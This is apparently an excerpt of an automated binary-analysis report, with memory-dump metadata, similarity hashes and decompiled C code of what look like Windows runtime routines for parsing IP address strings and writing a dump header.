                                                                                                                                                    0x0250eb8c
                                                                                                                                                    0x0250eb93
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0250eb93
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0250eb99
                                                                                                                                                    0x0250ec85
                                                                                                                                                    0x0250ec85
                                                                                                                                                    0x0250ec85
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    • RTL: Re-Waiting, xrefs: 025424FA
                                                                                                                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0254248D
                                                                                                                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 025424BD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                    • API String ID: 0-3177188983
                                                                                                                                                    • Opcode ID: 209191c9ddf2eae26b60ecd5992e88605a16c2f25672892d4b138490d71cc452
                                                                                                                                                    • Instruction ID: fe307a207be16b2168ec90fbb93393708356550deb065990d667f569c8093e87
                                                                                                                                                    • Opcode Fuzzy Hash: 209191c9ddf2eae26b60ecd5992e88605a16c2f25672892d4b138490d71cc452
                                                                                                                                                    • Instruction Fuzzy Hash: 0F41E970A00215AFDB20DF64CC85F6ABBA9FF85724F208A49F955DB2C0D734E941CB69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0251FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				signed int _v12;
                                                                                                                                                    				signed int _v16;
                                                                                                                                                    				signed int _v20;
                                                                                                                                                    				signed int _v24;
                                                                                                                                                    				signed int _v28;
                                                                                                                                                    				signed int _t105;
                                                                                                                                                    				void* _t110;
                                                                                                                                                    				char _t114;
                                                                                                                                                    				short _t115;
                                                                                                                                                    				void* _t118;
                                                                                                                                                    				signed short* _t119;
                                                                                                                                                    				short _t120;
                                                                                                                                                    				char _t122;
                                                                                                                                                    				void* _t127;
                                                                                                                                                    				void* _t130;
                                                                                                                                                    				signed int _t136;
                                                                                                                                                    				intOrPtr _t143;
                                                                                                                                                    				signed int _t158;
                                                                                                                                                    				signed short* _t164;
                                                                                                                                                    				signed int _t167;
                                                                                                                                                    				void* _t170;
                                                                                                                                                    
                                                                                                                                                    				_t158 = 0;
                                                                                                                                                    				_t164 = _a4;
                                                                                                                                                    				_v20 = 0;
                                                                                                                                                    				_v24 = 0;
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				_v12 = 0;
                                                                                                                                                    				_v16 = 0;
                                                                                                                                                    				_v28 = 0;
                                                                                                                                                    				_t136 = 0;
                                                                                                                                                    				while(1) {
                                                                                                                                                    					_t167 =  *_t164 & 0x0000ffff;
                                                                                                                                                    					if(_t167 == _t158) {
                                                                                                                                                    						break;
                                                                                                                                                    					}
                                                                                                                                                    					_t118 = _v20 - _t158;
                                                                                                                                                    					if(_t118 == 0) {
                                                                                                                                                    						if(_t167 == 0x3a) {
                                                                                                                                                    							if(_v12 > _t158 || _v8 > _t158) {
                                                                                                                                                    								break;
                                                                                                                                                    							} else {
                                                                                                                                                    								_t119 =  &(_t164[1]);
                                                                                                                                                    								if( *_t119 != _t167) {
                                                                                                                                                    									break;
                                                                                                                                                    								}
                                                                                                                                                    								_t143 = 2;
                                                                                                                                                    								 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                    								_v28 = 1;
                                                                                                                                                    								_v8 = _t143;
                                                                                                                                                    								_t136 = _t136 + 1;
                                                                                                                                                    								L47:
                                                                                                                                                    								_t164 = _t119;
                                                                                                                                                    								_v20 = _t143;
                                                                                                                                                    								L14:
                                                                                                                                                    								if(_v24 == _t158) {
                                                                                                                                                    									L19:
                                                                                                                                                    									_t164 =  &(_t164[1]);
                                                                                                                                                    									_t158 = 0;
                                                                                                                                                    									continue;
                                                                                                                                                    								}
                                                                                                                                                    								if(_v12 == _t158) {
                                                                                                                                                    									if(_v16 > 4) {
                                                                                                                                                    										L29:
                                                                                                                                                    										return 0xc000000d;
                                                                                                                                                    									}
                                                                                                                                                    									_t120 = E0251EE02(_v24, _t158, 0x10);
                                                                                                                                                    									_t170 = _t170 + 0xc;
                                                                                                                                                    									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                                                                                                                                    									_t136 = _t136 + 1;
                                                                                                                                                    									goto L19;
                                                                                                                                                    								}
                                                                                                                                                    								if(_v16 > 3) {
                                                                                                                                                    									goto L29;
                                                                                                                                                    								}
                                                                                                                                                    								_t122 = E0251EE02(_v24, _t158, 0xa);
                                                                                                                                                    								_t170 = _t170 + 0xc;
                                                                                                                                                    								if(_t122 > 0xff) {
                                                                                                                                                    									goto L29;
                                                                                                                                                    								}
                                                                                                                                                    								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                                                                                                                                    								goto L19;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						L21:
                                                                                                                                                    						if(_v8 > 7 || _t167 >= 0x80) {
                                                                                                                                                    							break;
                                                                                                                                                    						} else {
                                                                                                                                                    							if(E0251685D(_t167, 4) == 0) {
                                                                                                                                                    								if(E0251685D(_t167, 0x80) != 0) {
                                                                                                                                                    									if(_v12 > 0) {
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									_t127 = 1;
                                                                                                                                                    									_a7 = 1;
                                                                                                                                                    									_v24 = _t164;
                                                                                                                                                    									_v20 = 1;
                                                                                                                                                    									_v16 = 1;
                                                                                                                                                    									L36:
                                                                                                                                                    									if(_v20 == _t127) {
                                                                                                                                                    										goto L19;
                                                                                                                                                    									}
                                                                                                                                                    									_t158 = 0;
                                                                                                                                                    									goto L14;
                                                                                                                                                    								}
                                                                                                                                                    								break;
                                                                                                                                                    							}
                                                                                                                                                    							_a7 = 0;
                                                                                                                                                    							_v24 = _t164;
                                                                                                                                                    							_v20 = 1;
                                                                                                                                                    							_v16 = 1;
                                                                                                                                                    							goto L19;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t130 = _t118 - 1;
                                                                                                                                                    					if(_t130 != 0) {
                                                                                                                                                    						if(_t130 == 1) {
                                                                                                                                                    							goto L21;
                                                                                                                                                    						}
                                                                                                                                                    						_t127 = 1;
                                                                                                                                                    						goto L36;
                                                                                                                                                    					}
                                                                                                                                                    					if(_t167 >= 0x80) {
                                                                                                                                                    						L7:
                                                                                                                                                    						if(_t167 == 0x3a) {
                                                                                                                                                    							_t158 = 0;
                                                                                                                                                    							if(_v12 > 0 || _v8 > 6) {
                                                                                                                                                    								break;
                                                                                                                                                    							} else {
                                                                                                                                                    								_t119 =  &(_t164[1]);
                                                                                                                                                    								if( *_t119 != _t167) {
                                                                                                                                                    									_v8 = _v8 + 1;
                                                                                                                                                    									L13:
                                                                                                                                                    									_v20 = _t158;
                                                                                                                                                    									goto L14;
                                                                                                                                                    								}
                                                                                                                                                    								if(_v28 != 0) {
                                                                                                                                                    									break;
                                                                                                                                                    								}
                                                                                                                                                    								_v28 = _v8 + 1;
                                                                                                                                                    								_t143 = 2;
                                                                                                                                                    								_v8 = _v8 + _t143;
                                                                                                                                                    								goto L47;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                                                                                                                                    							break;
                                                                                                                                                    						} else {
                                                                                                                                                    							_v12 = _v12 + 1;
                                                                                                                                                    							_t158 = 0;
                                                                                                                                                    							goto L13;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					if(E0251685D(_t167, 4) != 0) {
                                                                                                                                                    						_v16 = _v16 + 1;
                                                                                                                                                    						goto L19;
                                                                                                                                                    					}
                                                                                                                                                    					if(E0251685D(_t167, 0x80) != 0) {
                                                                                                                                                    						_v16 = _v16 + 1;
                                                                                                                                                    						if(_v12 > 0) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						_a7 = 1;
                                                                                                                                                    						goto L19;
                                                                                                                                                    					}
                                                                                                                                                    					goto L7;
                                                                                                                                                    				}
                                                                                                                                                    				 *_a8 = _t164;
                                                                                                                                                    				if(_v12 != 0) {
                                                                                                                                                    					if(_v12 != 3) {
                                                                                                                                                    						goto L29;
                                                                                                                                                    					}
                                                                                                                                                    					_v8 = _v8 + 1;
                                                                                                                                                    				}
                                                                                                                                                    				if(_v28 != 0 || _v8 == 7) {
                                                                                                                                                    					if(_v20 != 1) {
                                                                                                                                                    						if(_v20 != 2) {
                                                                                                                                                    							goto L29;
                                                                                                                                                    						}
                                                                                                                                                    						 *((short*)(_a12 + _t136 * 2)) = 0;
                                                                                                                                                    						L65:
                                                                                                                                                    						_t105 = _v28;
                                                                                                                                                    						if(_t105 != 0) {
                                                                                                                                                    							_t98 = (_t105 - _v8) * 2; // 0x11
                                                                                                                                                    							E024F8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                                                                                                                                    							_t110 = 8;
                                                                                                                                                    							E024EDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                                                                                                                                    						}
                                                                                                                                                    						return 0;
                                                                                                                                                    					}
                                                                                                                                                    					if(_v12 != 0) {
                                                                                                                                                    						if(_v16 > 3) {
                                                                                                                                                    							goto L29;
                                                                                                                                                    						}
                                                                                                                                                    						_t114 = E0251EE02(_v24, 0, 0xa);
                                                                                                                                                    						_t170 = _t170 + 0xc;
                                                                                                                                                    						if(_t114 > 0xff) {
                                                                                                                                                    							goto L29;
                                                                                                                                                    						}
                                                                                                                                                    						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                                                                                                                                    						goto L65;
                                                                                                                                                    					}
                                                                                                                                                    					if(_v16 > 4) {
                                                                                                                                                    						goto L29;
                                                                                                                                                    					}
                                                                                                                                                    					_t115 = E0251EE02(_v24, 0, 0x10);
                                                                                                                                                    					_t170 = _t170 + 0xc;
                                                                                                                                                    					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                                                                                                                                    					goto L65;
                                                                                                                                                    				} else {
                                                                                                                                                    					goto L29;
                                                                                                                                                    				}
                                                                                                                                                    			}

























                                                                                                                                                    0x0254ec8a
                                                                                                                                                    0x0254ec90
                                                                                                                                                    0x0254ecb2
                                                                                                                                                    0x0251fd73
                                                                                                                                                    0x0251fd73
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fd73
                                                                                                                                                    0x0254ec95
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eca1
                                                                                                                                                    0x0254eca4
                                                                                                                                                    0x0254eca5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254eca5
                                                                                                                                                    0x0254ec7a
                                                                                                                                                    0x0251fd4a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fd6e
                                                                                                                                                    0x0251fd6e
                                                                                                                                                    0x0251fd71
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fd71
                                                                                                                                                    0x0251fd4a
                                                                                                                                                    0x0251fd21
                                                                                                                                                    0x0252a3a1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0252a3a1
                                                                                                                                                    0x0251fd36
                                                                                                                                                    0x0253200b
                                                                                                                                                    0x02532012
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02532018
                                                                                                                                                    0x00000000
                                                                                                                                                    0x02532018
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0251fd36
                                                                                                                                                    0x0251fe0f
                                                                                                                                                    0x0251fe16
                                                                                                                                                    0x0252a3ad
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0252a3b3
                                                                                                                                                    0x0252a3b3
                                                                                                                                                    0x0251fe1f
                                                                                                                                                    0x0254ed25
                                                                                                                                                    0x0254ed86
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ed91
                                                                                                                                                    0x0254ed95
                                                                                                                                                    0x0254ed95
                                                                                                                                                    0x0254ed9a
                                                                                                                                                    0x0254edad
                                                                                                                                                    0x0254edb3
                                                                                                                                                    0x0254edba
                                                                                                                                                    0x0254edc4
                                                                                                                                                    0x0254edc9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254edcc
                                                                                                                                                    0x0254ed2a
                                                                                                                                                    0x0254ed55
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ed61
                                                                                                                                                    0x0254ed66
                                                                                                                                                    0x0254ed6e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ed7d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ed7d
                                                                                                                                                    0x0254ed30
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0254ed3c
                                                                                                                                                    0x0254ed43
                                                                                                                                                    0x0254ed4b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fassign
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3965848254-0
                                                                                                                                                    • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                    • Instruction ID: aa0801d02d201e4a68f245a8c721a87aa7f143d138f2d1b9c599208b94b71c31
                                                                                                                                                    • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                    • Instruction Fuzzy Hash: 17919E71E0030AEFEF25CFA9C8457AEBBB4FF45308F20856AD405A7591E7304A51CB99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 80%
                                                                                                                                                    			E0259E9FF(void* __edx, signed int _a4, intOrPtr _a8, char _a12) {
                                                                                                                                                    				signed int _v5;
                                                                                                                                                    				int _v12;
                                                                                                                                                    				signed int _v16;
                                                                                                                                                    				char _v20;
                                                                                                                                                    				int _v24;
                                                                                                                                                    				signed int _v28;
                                                                                                                                                    				int _v32;
                                                                                                                                                    				signed int _v36;
                                                                                                                                                    				signed int _v40;
                                                                                                                                                    				signed int _v44;
                                                                                                                                                    				signed int _v48;
                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                    				char _v60;
                                                                                                                                                    				signed int _v64;
                                                                                                                                                    				char _v68;
                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                    				intOrPtr _v76;
                                                                                                                                                    				intOrPtr _v80;
                                                                                                                                                    				intOrPtr _v84;
                                                                                                                                                    				void _v96;
                                                                                                                                                    				char _v100;
                                                                                                                                                    				void _v140;
                                                                                                                                                    				char _v144;
                                                                                                                                                    				intOrPtr _v160;
                                                                                                                                                    				intOrPtr _v164;
                                                                                                                                                    				char _v172;
                                                                                                                                                    				char _v216;
                                                                                                                                                    				char _v220;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t231;
                                                                                                                                                    				signed char _t233;
                                                                                                                                                    				signed int _t237;
                                                                                                                                                    				signed int _t238;
                                                                                                                                                    				signed int _t244;
                                                                                                                                                    				short _t251;
                                                                                                                                                    				signed int _t253;
                                                                                                                                                    				signed int* _t254;
                                                                                                                                                    				signed int _t255;
                                                                                                                                                    				signed int _t257;
                                                                                                                                                    				signed int _t259;
                                                                                                                                                    				signed int _t260;
                                                                                                                                                    				signed int _t267;
                                                                                                                                                    				signed int _t271;
                                                                                                                                                    				intOrPtr _t281;
                                                                                                                                                    				signed int _t314;
                                                                                                                                                    				signed char _t316;
                                                                                                                                                    				signed int _t319;
                                                                                                                                                    				signed int _t322;
                                                                                                                                                    				signed int _t323;
                                                                                                                                                    				signed int _t326;
                                                                                                                                                    				signed int _t328;
                                                                                                                                                    				signed int _t330;
                                                                                                                                                    				signed int _t332;
                                                                                                                                                    				signed int _t334;
                                                                                                                                                    				int _t340;
                                                                                                                                                    				intOrPtr* _t341;
                                                                                                                                                    				signed int _t342;
                                                                                                                                                    				signed int _t343;
                                                                                                                                                    				signed int _t345;
                                                                                                                                                    				signed int _t347;
                                                                                                                                                    				signed int _t352;
                                                                                                                                                    				void* _t360;
                                                                                                                                                    				intOrPtr* _t370;
                                                                                                                                                    				intOrPtr _t371;
                                                                                                                                                    				intOrPtr* _t372;
                                                                                                                                                    
                                                                                                                                                    				_t360 = __edx;
                                                                                                                                                    				_t340 = 0;
                                                                                                                                                    				_t345 = 0xa;
                                                                                                                                                    				_v144 = 0;
                                                                                                                                                    				memset( &_v140, 0, _t345 << 2);
                                                                                                                                                    				_v20 = 0;
                                                                                                                                                    				_v220 = 0;
                                                                                                                                                    				E024EDFC0( &_v216, 0, 0x2c);
                                                                                                                                                    				_t371 = _a8;
                                                                                                                                                    				_t347 = 7;
                                                                                                                                                    				_v100 = 0;
                                                                                                                                                    				_t231 = memset( &_v96, 0, _t347 << 2);
                                                                                                                                                    				_t348 = 0;
                                                                                                                                                    				_v12 = 0;
                                                                                                                                                    				_v32 = 0;
                                                                                                                                                    				_v24 = 0;
                                                                                                                                                    				_v5 = _t231;
                                                                                                                                                    				if(_t371 != 0) {
                                                                                                                                                    					_v5 = 1;
                                                                                                                                                    				}
                                                                                                                                                    				_t370 = _a4;
                                                                                                                                                    				_t233 =  *(_t370 + 0xcc) >> 3;
                                                                                                                                                    				_t380 = _t233 & 0x00000001;
                                                                                                                                                    				if((_t233 & 0x00000001) != 0) {
                                                                                                                                                    					E0259E919(_t360, _t380, _t370 + 0x70, _t370 + 0x78, _t370 + 0x68);
                                                                                                                                                    				}
                                                                                                                                                    				_v52 =  *((intOrPtr*)(_t370 + 0x6c));
                                                                                                                                                    				_v16 =  *(_t370 + 0x80);
                                                                                                                                                    				if(_v5 != _t340) {
                                                                                                                                                    					_t42 = _t371 + 0x20; // 0x259c2d6
                                                                                                                                                    					_v32 = _t42;
                                                                                                                                                    					_t44 = _t371 + 4; // 0x5bcd335e
                                                                                                                                                    					_t237 =  *_t44 & 0x0000ffff;
                                                                                                                                                    					_v24 = _t237;
                                                                                                                                                    					_t238 = _t237 + 0x48;
                                                                                                                                                    					__eflags = _t238;
                                                                                                                                                    					L12:
                                                                                                                                                    					_v28 = _t238;
                                                                                                                                                    					_t372 = E024EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _v16);
                                                                                                                                                    					if(_t372 != _t340) {
                                                                                                                                                    						_t54 = _t372 + 0x48; // 0x48
                                                                                                                                                    						_t341 = _t54;
                                                                                                                                                    						_t244 = E0259E519(_t360, _v52, 0xc0000000, 1,  &_a12, 0x20000080,  &_v12);
                                                                                                                                                    						__eflags = _t244;
                                                                                                                                                    						_a4 = _t244;
                                                                                                                                                    						if(_t244 < 0) {
                                                                                                                                                    							L49:
                                                                                                                                                    							__eflags = _v12;
                                                                                                                                                    							if(_v12 != 0) {
                                                                                                                                                    								E024DF9F0(_v12);
                                                                                                                                                    							}
                                                                                                                                                    							L51:
                                                                                                                                                    							_t340 = 0;
                                                                                                                                                    							__eflags = 0;
                                                                                                                                                    							L52:
                                                                                                                                                    							if(_t372 != _t340) {
                                                                                                                                                    								E024EE025(_t348,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t340, _t372);
                                                                                                                                                    							}
                                                                                                                                                    							L54:
                                                                                                                                                    							return _a4;
                                                                                                                                                    						}
                                                                                                                                                    						__eflags = _a12 - 1;
                                                                                                                                                    						if(_a12 != 1) {
                                                                                                                                                    							 *_t372 = _v16;
                                                                                                                                                    							_t251 = 4;
                                                                                                                                                    							 *((short*)(_t372 + 0x36)) = _t251;
                                                                                                                                                    							 *((short*)(_t372 + 0x34)) = 1;
                                                                                                                                                    							_t253 = _v28;
                                                                                                                                                    							 *((char*)(_t372 + 0x29)) = 8;
                                                                                                                                                    							 *(_t372 + 0x30) = _t253;
                                                                                                                                                    							__eflags = _v5;
                                                                                                                                                    							if(_v5 != 0) {
                                                                                                                                                    								_t254 = _v32;
                                                                                                                                                    								_t254[8] =  *(_t370 + 0xcc) & 0x00101000 | 0x00010001;
                                                                                                                                                    								_t254[9] = 1;
                                                                                                                                                    								 *_t254 =  *(_t370 + 0x80);
                                                                                                                                                    								 *((char*)(_t372 + 0x6e)) = 1;
                                                                                                                                                    								 *((char*)(_t372 + 0x6f)) = 5;
                                                                                                                                                    								__eflags = _t254[0xb] - 8;
                                                                                                                                                    								if(_t254[0xb] != 8) {
                                                                                                                                                    									_t187 =  &(_t254[0x42]); // 0xf938e834
                                                                                                                                                    									_t255 =  *_t187;
                                                                                                                                                    								} else {
                                                                                                                                                    									_t186 =  &(_t254[0x44]); // 0x14538910
                                                                                                                                                    									_t255 =  *_t186;
                                                                                                                                                    								}
                                                                                                                                                    								 *(_t370 + 0x10) = _t255;
                                                                                                                                                    								E024E2340(_t341, _a8, _v24);
                                                                                                                                                    								L39:
                                                                                                                                                    								_t257 =  *(_t372 + 0x30);
                                                                                                                                                    								_t342 = _v16;
                                                                                                                                                    								__eflags = _t257 - _t342;
                                                                                                                                                    								if(_t257 < _t342) {
                                                                                                                                                    									__eflags = _t257 - 0x48;
                                                                                                                                                    									if(_t257 > 0x48) {
                                                                                                                                                    										__eflags = _t257 + _t372;
                                                                                                                                                    										E024EDFC0(_t257 + _t372, 0xff, _t342 - _t257);
                                                                                                                                                    									}
                                                                                                                                                    								}
                                                                                                                                                    								_push(0);
                                                                                                                                                    								_push(0);
                                                                                                                                                    								_push(_t342);
                                                                                                                                                    								_push(_t372);
                                                                                                                                                    								_t348 =  &_v60;
                                                                                                                                                    								_push( &_v60);
                                                                                                                                                    								_push(0);
                                                                                                                                                    								_push(0);
                                                                                                                                                    								_push(0);
                                                                                                                                                    								_t259 = E024DF938(_v12);
                                                                                                                                                    								_a4 = _t259;
                                                                                                                                                    								__eflags = _t259;
                                                                                                                                                    								if(_t259 < 0) {
                                                                                                                                                    									goto L49;
                                                                                                                                                    								} else {
                                                                                                                                                    									_t260 =  *(_t370 + 0xc8);
                                                                                                                                                    									__eflags = _t260;
                                                                                                                                                    									if(_t260 == 0) {
                                                                                                                                                    										L48:
                                                                                                                                                    										_t348 = _v12;
                                                                                                                                                    										 *(_t370 + 0x100) = 1;
                                                                                                                                                    										 *(_t370 + 0xd8) = 1;
                                                                                                                                                    										__eflags = 0;
                                                                                                                                                    										 *(_t370 + 0xf0) = _t342;
                                                                                                                                                    										 *(_t370 + 0xf4) = 0;
                                                                                                                                                    										 *(_t370 + 0xe8) = _t342;
                                                                                                                                                    										 *(_t370 + 0xec) = 0;
                                                                                                                                                    										 *(_t370 + 0x5c) = _v12;
                                                                                                                                                    										_v12 = 0;
                                                                                                                                                    										goto L49;
                                                                                                                                                    									}
                                                                                                                                                    									_t352 =  *(_t370 + 0xcc);
                                                                                                                                                    									__eflags = _t352 & 0x00000020;
                                                                                                                                                    									if((_t352 & 0x00000020) == 0) {
                                                                                                                                                    										goto L48;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags = _t352 & 0x00002000;
                                                                                                                                                    									_t348 = 0x400;
                                                                                                                                                    									if((_t352 & 0x00002000) == 0) {
                                                                                                                                                    										_t348 = 0x100000;
                                                                                                                                                    									}
                                                                                                                                                    									_push(0x14);
                                                                                                                                                    									_v40 = _t260 * _t348;
                                                                                                                                                    									_push(8);
                                                                                                                                                    									_push( &_v40);
                                                                                                                                                    									_push( &_v60);
                                                                                                                                                    									_v36 = _t260 * _t348 >> 0x20;
                                                                                                                                                    									_t267 = E024DFC48(_v12);
                                                                                                                                                    									_a4 = _t267;
                                                                                                                                                    									__eflags = _t267;
                                                                                                                                                    									if(_t267 < 0) {
                                                                                                                                                    										goto L49;
                                                                                                                                                    									} else {
                                                                                                                                                    										goto L48;
                                                                                                                                                    									}
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    							 *((intOrPtr*)(_t341 + 4)) = _t253 + 0xffffffb8;
                                                                                                                                                    							 *_t341 = 0xc0010000;
                                                                                                                                                    							_t271 =  *(_t370 + 0x10);
                                                                                                                                                    							__eflags = _t271 - 2;
                                                                                                                                                    							if(_t271 != 2) {
                                                                                                                                                    								__eflags = _t271 - 3;
                                                                                                                                                    								if(_t271 != 3) {
                                                                                                                                                    									_v48 = 0;
                                                                                                                                                    									_v44 = 0;
                                                                                                                                                    									E024F2954(1, _t372,  &_v48);
                                                                                                                                                    									 *(_t341 + 0x10) = _v48;
                                                                                                                                                    									 *((intOrPtr*)(_t341 + 0x14)) = _v44;
                                                                                                                                                    									L34:
                                                                                                                                                    									 *((intOrPtr*)(_t341 + 0xc)) = _v164;
                                                                                                                                                    									 *((intOrPtr*)(_t341 + 8)) = _v160;
                                                                                                                                                    									 *((intOrPtr*)(_t341 + 0x18)) = E02524FC0(_v84, _v80, _v140, 0);
                                                                                                                                                    									 *((intOrPtr*)(_t341 + 0x1c)) = E02524FC0(_v76, _v72, _v140, 0);
                                                                                                                                                    									_t281 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    									 *((char*)(_t372 + 0x6c)) =  *((intOrPtr*)(_t281 + 0xa4));
                                                                                                                                                    									 *((char*)(_t372 + 0x6d)) =  *((intOrPtr*)(_t281 + 0xa8));
                                                                                                                                                    									 *((char*)(_t372 + 0x6e)) = 1;
                                                                                                                                                    									 *((char*)(_t372 + 0x6f)) = 5;
                                                                                                                                                    									 *(_t372 + 0x70) =  *(_t281 + 0xac) & 0x0000ffff;
                                                                                                                                                    									 *(_t372 + 0x170) =  *(_t370 + 0x10);
                                                                                                                                                    									 *(_t372 + 0x74) =  *(_t370 + 0x7c);
                                                                                                                                                    									 *((intOrPtr*)(_t372 + 0x90)) = 1;
                                                                                                                                                    									 *(_t372 + 0x8c) = 1;
                                                                                                                                                    									 *((intOrPtr*)(_t372 + 0x94)) = 4;
                                                                                                                                                    									 *((intOrPtr*)(_t372 + 0x68)) = _v16;
                                                                                                                                                    									 *(_t372 + 0x84) =  *(_t370 + 0xc8);
                                                                                                                                                    									 *(_t372 + 0x88) =  *(_t370 + 0xcc);
                                                                                                                                                    									 *((intOrPtr*)(_t372 + 0x80)) = _v140;
                                                                                                                                                    									 *((intOrPtr*)(_t372 + 0x158)) = _v220;
                                                                                                                                                    									 *(_t372 + 0xa0) =  *(_t372 + 0xa0) & 0x00000000;
                                                                                                                                                    									 *(_t372 + 0xa4) =  *(_t372 + 0xa4) & 0x00000000;
                                                                                                                                                    									 *((intOrPtr*)(_t372 + 0x15c)) = _v216;
                                                                                                                                                    									 *((intOrPtr*)(_t372 + 0x9c)) = _v20;
                                                                                                                                                    									_t163 = _t372 + 0x178; // 0x178
                                                                                                                                                    									E024E2340(_t163,  *((intOrPtr*)(_t370 + 0x64)), ( *(_t370 + 0x60) & 0x0000ffff) + 2);
                                                                                                                                                    									E024E2340(( *(_t370 + 0x60) & 0x0000ffff) + _t372 + 0x17a,  *((intOrPtr*)(_t370 + 0x6c)), ( *(_t370 + 0x68) & 0x0000ffff) + 2);
                                                                                                                                                    									_t169 = _t372 + 0xa8; // 0xa8
                                                                                                                                                    									E0259E649(0, _t370, _t372, _t169);
                                                                                                                                                    									_t170 = _t372 + 0x160; // 0x160
                                                                                                                                                    									E024FB2FA(_v16, 0, _t170);
                                                                                                                                                    									 *((intOrPtr*)(_t372 + 0x168)) =  *_t370;
                                                                                                                                                    									 *((intOrPtr*)(_t372 + 0x16c)) =  *((intOrPtr*)(_t370 + 4));
